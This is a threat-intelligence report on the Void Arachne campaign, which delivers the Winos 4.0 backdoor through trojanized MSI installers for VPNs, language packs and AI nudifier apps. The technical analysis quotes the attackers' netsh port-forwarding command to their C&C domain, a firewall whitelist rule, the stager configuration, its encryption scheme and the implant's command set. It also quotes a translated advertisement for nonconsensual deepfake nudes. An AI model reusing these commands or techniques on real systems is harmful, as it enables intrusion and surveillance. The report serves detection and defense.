Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (2024)

Report highlights:

  • We recently discovered a new threat actor group that we dubbed Void Arachne. This group targets Chinese-speaking users with malicious Windows Installer (MSI) files in a recent campaign. These MSI files contain legitimate software installer files for AI software and other popular software but are bundled with malicious Winos payloads.
  • The campaign also promotes compromised MSI files embedded with nudifiers and deepfake p*rnography-generating software, as well as AI voice and facial technologies.
  • The campaign uses SEO poisoning tactics and social media and messaging platforms to distribute malware.
  • The malware installs a Winos backdoor during the installation process, which could lead to a full system compromise.
  • Due to strict government control in China, VPN services and public interest in this technology have notably increased. And in this Void Arachne campaign, we’ve observed how threat actors are exploiting the heightened public interest in software that can evade the Great Firewall and online censorship.

In early April, we discovered that a new threat actor group (which we call Void Arachne) was targeting Chinese-speaking users. Void Arachne’s campaign involves the use of malicious MSI files that contain legitimate software installer files for artificial intelligence (AI) software as well as other popular software. The malicious Winos payloads are bundled alongside nudifiers and deepfake p*rnography-generating AI software, voice-and-face-swapping AI software, zh-CN (Simplified Chinese) language packs, the simplified Chinese version of Google Chrome, and Chinese-marketed virtual private networks (VPNs), such as LetsVPN and QuickVPN. During the process of installation, a Winos backdoor is also installed, which could also lead to full system compromise.

During this campaign, we observed numerous malicious installer files being shared across several Telegram channels. We also saw attacker-controlled web servers that distribute malicious files through search engine optimization (SEO) poisoning attacks. These MSI files act as backdoored installers, serving both the non-malicious software and the Winos 4.0 command-and-control (C&C) framework implant, which could lead to a full system compromise. Winos (not to be confused with the Windows operating system) is a backdoor used by Chinese threat actors with an extensive array of capabilities for remotely controlling a compromised computer.

Attack diagram

We observed multiple initial access vectors that the Void Arachne threat actor group uses to distribute malware across the web and through social media platforms. These distribution methods include an infrastructure staged for SEO poisoning and malicious package distribution across Chinese-language-themed Telegram channels.

Initial access

We observed multiple initial access vectors that the Void Arachne threat actor group uses to distribute malware across the web and through social media platforms. These distribution methods include an infrastructure staged for SEO poisoning and malicious package distribution across Chinese-language-themed Telegram channels.

SEO poisoning (T1608.006)

For this campaign, Void Arachne set up a web infrastructure that is used for SEO poisoning that deployed spear-phishing links (T1566.002) disguised as legitimate software installers to lure potential victims. These links are hosted on web servers disguised as legitimate websites so that the Void Arachne threat group can proceed to make them rank high on search engines via SEO poisoning.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (1)

These links contain MSI installers for common software targeting Chinese-speaking users such as Google Chrome, Chinese language packs for popular software, and VPNs such as LetsVPN and 快連VPN (also known as Quick VPN or Kuilian VPN). When these malicious MSI files or archive files are downloaded and executed, they would bootstrap the infection process. To the victim, it appears as if the intended software was installed. However, unbeknownst to them, additional malware is installed that beacons back to the attacker’s C&C server.

Because MSI files are bundled software installers, threat actors can include backdoors and additional malware within the file bundle that are executed without the end user’s knowledge during the installation process.

In this campaign, the Void Arachne group created subdomains of the domain webcamcn[.]xyz to act as C&C servers for the various MSI files. As the campaign progressed, various subdomains were added to this root domain.

Targeting VPN-related technologies for spearphishing

Internet connectivity in the People’s Republic of China is subject to strict regulation through a combination of legislative measures and technological controls collectively known as the Great Firewall of China. Due to strict government control, VPN services and public interest in this technology have notably increased. This has, in turn, enhanced threat actors' interest in exploiting the heightened public interest in software that can evade the Great Firewall and online censorship.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (2)

We discovered that the VPN “快連VPN” is a common phishing and SEO poisoning vector used to target Chinese-speakers and the broader East Asian community. We have evidence of multiple distinct Chinese-speaking threat actors creating spear-phishing links and using SEO poisoning tactics by bundling this VPN with malware that includes Gh0st RAT and its variants.

Spearphishing through Telegram

We observed several Telegram channels, some of which had tens of thousands of Chinese-speaking users, advertising malicious archives and MSI files as an additional distribution method. The malicious packages are in what appear to be Simplified Chinese language packs for Telegram as well as various AI tools.

VPN-related Telegram channels

Like what’s being promoted in Void Arachne’s SEO poisoning campaign, we also observed the same malicious MSI files being shared in Chinese language-centric Telegram Channels. These channels are all related to VPN technology and the malicious MSI files were shared across several Telegram channels.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (3)

This is like other campaigns we’ve observed wherein after threat actors conduct SEO-poisoning tactics, they then share links to these malicious sites or upload related files on social media and messaging applications.

Malicious Simplified Chinese language packs for Telegram

A common malicious software package we observed is what appears to be a Telegram language pack for the Simplified Chinese language. (Telegram does offer a translation of its app in Simple Chinese, which may be found here.)

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (4)

Using infected language packs as an infection vector is an interesting method, especially for the Chinese language, which has an estimated 1.3 billion native speakers. Some applications require language packs for a more localized user experience in regional markets, leaving these users potentially vulnerable to this kind of attack.

Nudifier AI technologies promoted on Telegram channels

A concerning trend we have recently observed is the mass proliferation of nudifier applications that abuse AI to create AI-generated nonconsensual deepfake p*rnography. These images and videos are often used in sextortion schemes for further abuse, victim harassment, and financial gain.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (5)

Figure 6 shows a screenshot of a video on the Void Arachne Telegram channel where a photo of a woman was used to generate a deepfake p*rnographic video of using AI technology.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (6)

We’ve observed that the threat actors pinned the malicious MSI file to the top of their Telegram channels to increase the chances of infecting users who are interested in using this type of technology.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (7)

The malicious installer files are advertised on social media and Telegram channels and are intended to lure unsuspecting victims, potentially even minors. Based on an initial Simplified Chinese to English translation of their advertisem*nt via Google Translate, the malicious actors are also targeting young individuals who are still in school with their use of the phrase “female classmate.”

Just have appropriate entertainment and satisfy your own lustful desires. Do not send it to the other party or harass the other party. Once you call the police, you will be in constant trouble! AI takes off clothes, you give me photos and I will make pictures for you. Do you want to see the female classmate you yearn for, the female colleague you have a crush on, the relatives and friends you eat and live with at home? Do you want to see them naked? Now you can realize your dream, you can see them naked and lustful for a pack of cigarette money.

A Simplified Chinese to English translation of an advertisem*nt that promotes nudifiers or deepfake p*rnography-generating software on the threat actor’s Telegram channel

Void Arachne also advertised AI technologies that could be used for virtual kidnapping, which is a novel deception campaign that uses misinformation through AI voice-alternating technology to pressure victims into paying ransom.

Voice-altering and face-swapping AI technologies promoted on Telegram

In addition to fake nudifier applications, we saw additional channels advertising face-swapping and voice-changing software. Like the rise of nudifiers and deepfake-generating applications, we have also observed the rise of AI-powered apps that have face-swapping and voice-altering capabilities.

We’ve found that malicious MSI files were shared and pinned on various AI video and voice manipulation Telegram channels.

Figure 10 shows a screen capture of a threat actor video posted on Void Arachne’s Telegram channel wherein the malicious actor can be seen using AI face- and voice-cloning technology on a WhatsApp call. Figure 12, on the other hand, shows a malicious voice-altering and face-swapping AI app installer on Telegram.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (9)

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (10)

Technical analysis

Letvpn MSI analysis

NameLetvpn.msi
SHA256fae4f96beda54a1ed4914537b0542182d3a020dd9db9d9995df37d303b88e6df
Size27.05 MB
TypeWindows Installer

This sectiondiscusses our analysis of the malicious files associated with Void Arachne’s campaign, starting with the letvpn.msi file.

The malicious MSI file uses Dynamic Link Libraries (DLLs) during the installation process. These DLLs play a pivotal role during runtime, facilitating various essential operations including property management within MSI packages, scheduling tasks, and configuring firewall rules.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (11)

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (12)

The MSI file performs several tasks, such as creating scheduled tasks and configuring firewall parameters. Specifically, we have observed the creation and configuration of firewall rules via the OnFwConfig and OnFwInstall functions from NetFirewall.dll, which are designed to whitelist both inbound and outbound traffic associated with the malware for the public network profile only.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (13)

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (14)

Figure 16 shows the configuration of the inbound firewall rule created to enable unrestricted access for the malware when connected to public networks, ensuring that the malware can operate without interruption.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (15)

Furthermore, letvpn.msi drops multiple hidden files, including the LetsPro.exe loader, within the designated directory path C:\Program Files (x86)\Common Files\Microsoft Shared\. Subsequently, it initiates the execution of the LetsPRO loader.

File nameSizeMD5 hashParent directory
19996288D82362C15DDB7206010B8FCEC7F611C5C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0
LetsPRO.exe (Loader)40960FE7AEDAB70A5A58EFB84E6CB988D67A4C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0
LetsPRO.exe2472727BB188DFEE179CBDE884A0E7D127B074C:\Program Files (x86)\Common Files\Microsoft Shared\VGX

Table 1. Sample of files dropped by LetsPro.msi

Trojan loader LetsPro.exe analysis

NameLetsPRO.exe
SHA256768881a43d2ffd9701bf2e241a1d59d8a0c116cf20e27a632a8b087bb81de409
Compilation time2024-02-03 3:59:52 a.m.
Size40.00 KB
CompilerMicrosoft Visual C/C++ (2003 v.7.1 (3052-9782)) [EXE32]
TypeEXE

LetsPro.exe is a trojan loader that decrypts, maps, and executes a second-stage payload in memory. The loader first reads and loads the content of a file named “1”, with the following content structure:

struct payload_struct {
uint32_t flag; // 1 if the data is encrypted, 0 if it's plaintext/Memory clean up
uint32_t fileSize; // Size of the encrypted data in bytes
char encryptedData[]; // The encrypted payload
};

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (16)

It then identifies the encrypted data section within the file. The initial part of the file structure contains a flag set to 1, which indicates encryption. The loader uses the Rivest Cipher 4 (RC4) algorithm with the key "0x678E0B00" to decrypt this data. After decryption, the payload, which is now executable code, is mapped into the process's memory space and executed.

The decryption key structure is defined as follows:

struct decryption_key_struct {
uint32_t memory_cleanup; // Flag for memory cleanup after decryption
uint32_t keySize; // Size of the decryption key
char key[]; // Decryption key
};

The following code snippet demonstrates the core part of the loader logic:

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (17)

The following snippet demonstrates the decrypted file 1 structure in memory:

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (18)

Second-stage loader analysis

SHA25677c77e728b98a923bb057943d0b5765b79106c0378d72814cb3db69749abaebb
Size15.77 MB
Compilation time2024-05-11 08:02:23
TypeDLL

After the second-stage loader (file “1”) is executed and loaded into memory, the malware drops a Visual Basic Script (VBScript) designed to automate the creation of a scheduled task within Windows Task Scheduler to achieve persistence. The VBScript file will create a new scheduled task and configure task settings to run when a user is logged on to execute a specified batch file. Additionally, the malware creates a Windows service that starts with CreateSvc_ to execute the VBScript file. At the time of research, the batch file was not available.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (19)

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (20)

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (22)

After that, the malware replicates the loader, VBScript, and the file “1” within the user directory.

File nameSizeMD5Parent directory
19996288D82362C15DDB7206010B8FCEC7F611C5C:\Users\%USERNAME%\<Random Directory Name>
792258.vbs2405CD95B5408531DC5342180A1BECE74757C:\Users\%USERNAME%\<Random Directory Name>
LetsPRO.exe40960FE7AEDAB70A5A58EFB84E6CB988D67A4C:\Users\%USERNAME%\<Random Directory Name>

Table 2. Sample of files dropped by 1

The malware also uses the netsh command to set up port forwarding and configure firewall rules named “Safe<integer>” on the victim’s machine, thereby whitelisting inbound and outbound traffic related to the malware for all network profiles.

It establishes a rule for IPv4-to-IPv4 port forwarding. Specifically, it designates port 443 as the listening port on the local machine, where incoming connections will be received. It specifies a destination address (103.214.147.14[.]webcamcn[.]xyz), indicating where the forwarded traffic will be directed. Additionally, it designates port 443 on the destination server as the port to which the incoming traffic will be forwarded. This configuration redirects traffic from the local machine's port 443 to the specified destination address and port.

netsh interface portproxy add v4tov4 listenport=443 connectaddress=103[.]214[.]147[.]14[.]webcamcn[.]xyz connectport=443

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (23)

netsh advfirewall firewall add rule name="Safe1" dir=in action=allow program=" C:\Program Files (x86)\Common Files\Microsoft Shared\VGX\app-3.4.0\LetsPRO.exe"

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (24)

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (25)

Finally, the malware passes the execution to the Winos 4.0 stager in memory.

Winos 4.0 C&C framework overview

The final payload of this attack is the Winos 4.0 implant, which is written in C++ and targets the Windows platform. Winos has features that include file management, distributed denial of service (DDoS) using TCP/UDP/ ICMP/HTTP, full disk search, webcam control, and screen capturing. Additionally, it supports many functionalities including process injection and microphone recording, system and service management, remote shell access, and keylogging functionalities, further enhancing its ability to control and monitor the infected system.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (26)

The Winos C&C server is equipped with 23 internal plugins, each compiled in both 32- and 64-bit versions, to execute a variety of tasks. Table 3 shows the complete list of these plugins, along with their respective SHA256 hashes:

Simplified Chinese module namesTranslated module namesSHA256 hash
播放监听.dllPlay monitor.dll7ed8c7ea5e2feeadb1966f53c48ab3a580f53a4d20725031d764db7e962607a9
查注册表.dllcheck registry.dll49120dfcef430df1c90c9c370b92b969c876b9b4327d81eae720cd71fcd75b87
差异屏幕.dlldifference screen.dll5f7e00017b16db29fa7cba60993d7af909ef41d3fe9d3f7ca9f693c1f7ef6d37
代理映射.dllproxy mapping.dll023822a8ad26f2d7330a2afa310ccf943058f2765b7cbc6975c51c144739b55f
服务管理.dllservice management.dll3ac0afec0ce29b69d57c54663c6e4fa6fee703696069cb5b8f00783b5504cf80
高速屏幕.dllhigh-speed screen.dllbc01cf528086de6a1b231dee01c1624cf58911b171904bf7a6b08ddfba661d83
后台屏幕.dllBackground Screen.dll2066dd040fe020ca32e5ebfeeb4fa75094d3ac43155c83fe222f380d4940df42
急速搜索.dllRapid Search.dll5759fc938f228579fc5e64e74cee083581a975d4054deb715c0f371b66b96263
键盘记录.dllKeylogger.dll976837663b25f793470f24925198b06e79a72ede014a84ba62311fadede5062f
上线模块.exe (stager)Online Module.dll436499efe94c7a1bfefaa84c52f8187bffb3d4d1a49de1cbc8885e7807d11b42
上线模块.dll (stager)Online Module.dll5684fc4f33c168519b2fdcae59cc3be2e6db1f0b0f3718524ef57e0e7423f59d
视频查看.dllVideo Viewing.dll7a3841a5315c01df299d8844b62dc150b1c3e5b5ebe7547c1a211349879659af
视频查看.dllVideo Surveillance.dll7a3841a5315c01df299d8844b62dc150b1c3e5b5ebe7547c1a211349879659af
文件管理.dllFile Management.dll5abc2006c7a3a27e033075ba881a668aba5e70797677ed2220f7ab9fb36fc927
系统管理.dllSystem Management.dll827ed4f36ea7032395bfa35da54c6e9d06d6633aa7396792e8511adf366c1fcc
远程交谈.dllRemote Communication.dllc61c8ded2a9481c2e50b4872c8f7bcd8ecc33997a6004e62aa06b60742f54e57
远程终端.dllRemote Terminal.dll409e09ac0fcf7d39044ef0b3eb798aea6dc0650e5214056760694c1340fc8488
注入管理.dllInjection management.dllecf5394d78392b11daec1016c6b447f9da7eae69f7702ecf8c4d1d3f69e3fe64
娱乐屏幕.dllEntertainment Screen.dll6ce947e21128687ed37f247e297f29609251deed934b7b5722d27f4a1f72a90e
压力测试.dll (DDOS module)Stress Test.dll61d73a8920c41483d0832c9a5c5bc9f57ac5f71146a98faefc0cb4d988e77bab
计划任务.dllScheduled Tasks.dll4791c23aff8a09061b76a05bb88ee37149995584a87aade236ea4eebab79ed1c
登录模块.dllLoginModule.dll16d3c176ca94c84b60e26981231bf59ebe75057ac10dd6f583ce65a3bed11dd0
(shellcode)-b022e0f0b2ae9e27847cfc909bfcdbc89a732fcdde6e473443aaab2592a84910

Table 3. Winos 4.0 internal plugins

Similar to Cobalt Strike and Sliver, Winos supports custom plugins that can be developed by a threat actor. This allows the tool to extend its capabilities and add custom functionality. During our investigation, we found the following external and custom plugins for Winos 4.0 in the wild:

Plugin name in ChinesePlugin name in EnglishSHA256 hash
删除360急速安全账号密码.dllDelete 360 Speed Security Account Password.dll03669424bdf8241a7ef7f8982cc3d0cf56280a5804f042961f3c6a111252ffd3
提权-EnableDebugPrivilege.dllElevate Privileges-EnableDebugPrivilege.dll11a96c107b8d4254722a35ab9a4d25974819de1ce8aa212e12cae39354929d5f
体积膨胀.dllVolume Expansion.dll186bf42bf48dc74ef12e369ca533422ce30a85791b6732016de079192f4aac5f
提权ShellExecuteEx.dllElevate Privileges-ShellExecuteEx.dll202c378deb628a8104a1dd957bbd70b945beea8e11d55b9ce3e4787fbe496797
删除sogou账号密码.dllDelete Sogou Account Password.dll2d1904dfc5a555b8bfdd4fa2db46d532e19479fd99affb169449ff2a2a4b459a
提权-RtlAdjustPrivilege.dllElevate Privileges-RtlAdjustPrivilege.dll47dfa891fc347187ba4ac161980a7e7c47cf656ddbf7b269a74c32a5a1365d4e
删除ie账号密码.dllDelete IE Account Password.dll538382dc7a7839f125ffe08a854512b78fc4a657697227e53f832ae566ca2505
提权-CreateProcessInSession0.dllElevate Privileges-CreateProcessInSession0.dll616c7270a21ecc9ccd880e04563343e9ac53cce88a77244388dbb1fc7bfa4360
写启动目录.dllWrite to Startup Directory.dll61981a0324586ad83e6cb7015df91a6e4887537ad36a4674be82cb3cfcf5b18b
写注册表启动.dllWrite to Registry Startup.dlld2e15264c786917a6cb194bf0cf586a69b8678c6d4d4c87cc14082d7b76fe0b2
删除自身.dllDelete Itself.dll6ece1e12d50ade02bf424007a9b70b4a14580244a9a1f5cd32c0a129ec069d6e
内网主机扫描.dllInternal Network Host Scan.dll6f5574d00ffce206525835f72ac083692a183e69114f1551b7ecb99dec3d1d19
解密数据.dllDecrypt Data.dll6f923b94a614e61cbde73c5b09036b9482f3770c02161ecb0875dbb56bc65843
删除chrome账号密码.dllDelete Chrome Account Password.dllfbc23b84b2c83e99ab1c5cb7075bd5d26b55dde4afc06eddc0471c6d6b2cc5f2
写计划任务.dllWrite Scheduled Task.dll65ac9f036b1d8a02e4c9041eeafc230562088e57f2535bd194e8bf592e62cb06
删除telegram账号密码.dllDelete Telegram Account Password.dll2d1904dfc5a555b8bfdd4fa2db46d532e19479fd99affb169449ff2a2a4b459a
删除qq账号密码.dllDelete QQ Account Password.dllb71e6c4ff7c910dd666f442e98597f90bd2eb3fce4c8889af0ecc694f282bf64
删除skype账号密码.dllDelete Skype Account Password.dllb396bfd7bec043cf402e04fa810983c93c79d1a632fd4558098e68eb144abb17

Table 4. Winos 4.0 external plugins

Winos 4.0 stager analysis

File name上线模块.dll (Online Module.dll)
MagicPE32 executable (DLL)
SHA2562962bb303b949e4a0826c723ee4aee2df8cb0806653a8ca6daaa67fd06f37e6f
CompilerMicrosoft Visual C/C++
Compilation time2023-05-23 09:24:06
Size109 KB
TypeDLL

The second stage loader discussed earlier executes the Winos stager payload, 上线模块.dll/exe (which translates to Online Module.dll/exe). This module can be generated in both EXE and DLL formats. In this campaign, the attacker delivers a DLL implant. This module is responsible for downloading and executing the main implant, 登录模块.dll (which translates to LoginModule.dll), on an infected system.

Upon execution, the stager reads and initializes its configuration. Notably, the configuration is in cleartext but is arranged in reverse order. The following is the fixed configuration setup:

|p1:127.0.0.1|o1:443|t1:1|p2:103[.]214[.]147[.]14[.]webcamcn[.]xyz|o2:80|t2:1|p3:103[.]214[.]147[.]14[.]webcamcn[.]xyz|o3:80|t3:0|dd:1|cl:1|fz:默认|bb:1.0|bz:2024. 4.18|jp:0|bh:0|ll:0|dl:0|sh:0|kl:0|bd:0|

Table 5 contains the stager’s configuration values and their descriptions.

ConfigDescriptionValue
p1First C&C address127.0.0.1
o1First C&C port443
t1Communication protocol TCP/UDP1 (TCP)
p2Second C&C address103[.]214[.]147[.]14[.]webcamcn[.]xyz
o2Second C&C port80
t2Communication protocol TCP/UDP1 (TCP)
p3Third C&C address: Backup address in case p1 and p2 fail103[.]214[.]147[.]14[.]webcamcn[.]xyz
o3Third port80
t3Communication protocol TCP/UDP0 (UDP)
ddImplant execution delay in seconds1
clC&C communication interval (beaconing) in seconds1
fzGrouping默认 (Default)
bbVersion1.0
bzComment: Default value is implant generation time2024. 4.18
jpKeylogger0
sxAnti-VM0
bhEnd bluescreen0
llAntitraffic monitoring0
dlEntry point0
shProcess daemon0
klProcess hollowing0
bd-0

Table 5. Winos 4.0 stager configuration values and descriptions

To communicate with its C&C server, the malware first needs to generate an encryption key to secure the communication. To generate this key, the malware calls the timeGetTime() Windows API function, which returns the system time in milliseconds, and appends “00 00 00 00 ca 00” to it. The data that needs to be transferred is then encrypted with this key and appended after the key.

Figure 28 is an example of an initial handshake between the stager and the C&C server. The malware encrypts and sends the hardcoded value “04 00” to its C&C server to indicate that this initial packet contains the key. The server then uses this session key for future communications.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (27)

The encryption algorithm begins by preparing a block of data and a key, adjusting the buffer to ensure that there is sufficient space to work with both. The key is then appended to the beginning of the data that needs to be encrypted. The algorithm proceeds with the encryption process, which involves a loop that processes each byte of data. For each byte, a specific byte from the key is selected and transformed by taking its modulus with a hardcoded value (0x1C8) and then adding another hardcoded value (0x36) to it. This transformed key is then used to XOR with the current byte of the data, resulting in the encrypted byte that replaces the original byte in the data. Every ten bytes, the algorithm resets the pointer to the beginning of the key, ensuring that the key is reused cyclically.

It should be noted that, based on our analysis, the value 0x1C8 remained the same in all the samples used in this campaign and several other attacks. However, we have observed that some variants found in the wild use different values, such as 0x7C5, indicating that this value might change from sample to sample. However, the value 0x36 remained the same in all the variants we analyzed.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (28)

Next, the C&C server responds with a magic value of “04” and a unique 16-byte identifier in UTF-16 format. In some Winos variants, this identifier is the MD5 hash of the DLL module that will be downloaded. Figure 30 is an example of the C&C server response to network traffic.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (29)

Figure 31 shows a decrypted packet data section.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (30)

The stager then sends the next-stage payload plugin, named 登录模块.dll (LoginModule.dll), to the C&C server.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (31)

Figure 33 shows the decrypted packet data section.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (32)

The C&C server response contains the following information:

  • Module name
  • Module hash
  • Binary loader shellcode
  • DLL module binary file

The stager then saves the decrypted C&C server response (the plugin and its configuration) into the Windows Registry. It uses the name "d33f351a4aeea5e608853d1a56661059" and stores it under the key path HKEY_CURRENT_USER\Console\0 for 32-bit plugins or HKEY_CURRENT_USER\Console\1 for 64-bit plugins.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (33)

Finally, to execute the module, the stager locates the shellcode section within the response received from the C&C server at offset 0xA44 and transfers control to the shellcode.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (34)

Winos main implant analysis

File name登录模块.dll (LoginModule.dll)
MagicPE32 executable (DLL)
SHA25678f86c3581ae893e17873e857aff0f0a82dcaed192ad82cd40ad269372366590
CompilerMicrosoft Visual C/C++
Compilation time2023-05-23 09:24:23 UTC
Size195.00 KB (199680 bytes)
TypeDLL

The 登录模块.dll (LoginModule.dll) is a fundamental component of Winos 4.0, serving as the core plugin manager for the system. This module is responsible for handling every action and command executed by the operator, which are transmitted via the C&C server as DLL plugins. These plugins extend the functionality of the implant.

Upon receiving the response from the C&C server, the implant stores these DLL plugins in the Windows registry paths HKEY_CURRENT_USER\Console\0 for 32-bit systems or HKEY_CURRENT_USER\Console\1 for 64-bit systems. Subsequently, the implant loads and uses these plugins to perform various tasks, enhancing its operational capabilities. This modular approach allows for a highly flexible and extensible framework, enabling the efficient execution of diverse functions as required by the operator.

Once the 登录模块.dll (LoginModule.dll) plugin is downloaded, the execution of this module is based on the previously mentioned configuration. The malware creates a thread to collect clipboard data and keystrokes. It also employs a specific mutex for this thread, which is named 测试备注 (Test Notes).

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (35)

Next, the malware chooses one of the three available C&C configurations. Before initiating the socket, it checks whether the antianalysis feature is configured to run. If this feature is configured, the malware verifies the presence of monitoring software by inspecting the window titles of running processes. If such software is detected, the malware enters sleep mode.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (36)

Below is a list of monitoring software that the malware detects:

  • 流量(Flow)
  • TaskExplorer
  • Wireshark
  • Fiddler
  • Process
  • ApateDNS
  • CurrPorts
  • 任务管理器(Task manager)
  • 火绒(Tinder)
  • 提示符(Prompt)
  • Malwarebytes
  • Port
  • 资源监视器(Resource monitor)
  • Capsa
  • TCPEye
  • Metascan
  • 网络分析(Network analysis)
  • Sniff

The malware collects system information from an infected machine, including the IP address, computer name, antivirus software, operating system details, and hardware ID (HWID).

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (37)

Table 6 shows a list of targeted antivirus (AV) software.

AV vendorTargeted AV process
360 Total Security360Safe.exe | 360Tray.exe | 360tray.exe | ZhuDongFangYu.exe | 360sd.exe
金山(Jinshan)Kxetray.exe | KSafeTray.exe | kscan.exe | kwsprotect64.exe | kxescore.exe
QQQQPCRTP.exe | QMDL.exe | QMPersonalCenter.exe | QQPCPatch.exe | QQPCRealTimeSpeedup.exe | QQPCTray.exe | QQRepair.exe
BaiduBaiduSd.exe | baiduSafeTray.exe
江民(Jiang Min)KvMonXP.exe | RavMonD.exe
QuickHealQUHLPSVC.EXE
Microsoft MSEmssecess.exe
Comodocfp.exe
DR.WEBSPIDer.exe
Outpostacs.exe
安博士V3 (Dr. An V3)V3Svc.exe
韩国胶囊(Korean capsules)AYAgent.aye
AVGavgwdsvc.exe
F-Securef-secure.exe
卡巴(Kaba)avp.exe
avpui.exe
McAfeeMcshield.exe
NOD32egui.exe
可牛(Ke Niu)knsdtray.exe
Trend MicroTMBMSRV.exe
小红伞(Red Umbrella)avcenter.exe
Nortonrtvscan.exe
AvastashDisp.exe
Panda Antivirus Titaniumremupd.exe
BitDefendervsserv.exe
PSafePSafeSysTray.exe
Ad-watchad-watch.exe
K7K7TSecurity.exe
UnThreatUnThreat.exe

Table 6. List of targeted antivirus software


Next, the malware employs the encryption algorithm that we’ve previously discussed to encrypt all collected data. Using the timeGetTime() Windows API function, a new key will be generated to encrypt the collected data, which is different from the key used during the stager’s initial request. The malware appends the hardcoded value “06 00” to the encryption key to indicate that this request contains collected data. Unlike the stager, LoginModule.dll doesn’t send the key in a separate request, instead, it prefixes the value of the key to the collected data and sends this encrypted request to the C&C server.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (38)

Figure 40 shows the initial packet that the malware sends.

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (39)

Behind the Great Wall Void Arachne Targets Chinese-Speaking Users With the Winos 4.0 CC Framework (40)

The malware then begins to listen for incoming commands from the C&C server. It can execute a variety of tasks, including loading additional plugins, capturing screenshots, and clearing system logs. These functions are managed and executed through controlled switch statements, ensuring precise and efficient handling of each instruction.

Table 7 lists the malware’s supported functionalities.

CommandsDescription
0Load plugins
1Load the plugin and update the registry
2Terminate the connection
3Send the active window information and capture a screenshot
4Capture a screenshot
5Execute file and commands
6Download a file from the given URL and execute it
7Modify the registry value of specific keys and, if the key doesn’t exist, create it
8Check whether a process with the provided name exists on the system by enumerating the list of running processes
9N/A
10Capture a screenshot
11Clear system logs: Application, security, and system
12Restart the process
13Terminate the process
14Logout from the system
15Restart the system
16Shutdown the system
17Change the default plugin loading method
18Update configuration settings
19Create a new C&C thread and perform system information collection
100Set the value ofIpDatespecialregistry
101Remove the value ofIpDatespecialregistry

Table 7. A list of the malware’s supported functionalities

Conclusion

In the scope of our research, we conducted an analysis of a Void Arachne campaign that targets the Chinese-speaking demographic. Using SEO poisoning and widely used messaging applications such as Telegram, the Void Arachne threat group has potentially reached a substantial Chinese-speaking demographic as well as the broader East Asian community through the dissemination of malicious MSI files.

As is the case with Void Arachne’s campaign, threat actors abused the great public interest in AI technologies to deliver malware. Our investigation revealed that Void Arachne promoted compromised MSI files embedded with nudifiers and deepfake p*rnography-generating software, intending to infect unsuspecting users. Furthermore, the group advertised corrupted AI voice and facial technologies, frequently exploited in virtual kidnapping schemes. The proliferation of these artificial technologies has prompted concerns regarding potential misuse, particularly evident in sextortion and virtual kidnapping schemes that can lead to heartbreaking consequences. In its commitment to safeguarding the general public’s online well-being, Trend Micro has curated comprehensive resources designed to educate the community on identifying, preventing, and addressing sextortion attacks. In the event of falling victim to sextortion or virtual kidnapping, the prompt reporting of the incident to relevant authorities, such as the Internet Crime Complaint Center (IC3), is strongly recommended.

Throughout 2024, we have seen an increase in malicious MSI files, such as in a DarkGate campaign that exploited the Microsoft Windows Internet Shortcut SmartScreen Bypass Vulnerability (CVE-2024-21412). Individuals are strongly advised to check the source of MSI files and only download them from trusted sources. As previously discussed, MSI files are bundled installers, which mean that malicious software as well as zero-day exploits can be bundled alongside legitimate software. These malicious MSI files pose a significant threat to organizations as they may act as a backdoored installer and poison the software installer supply chain.

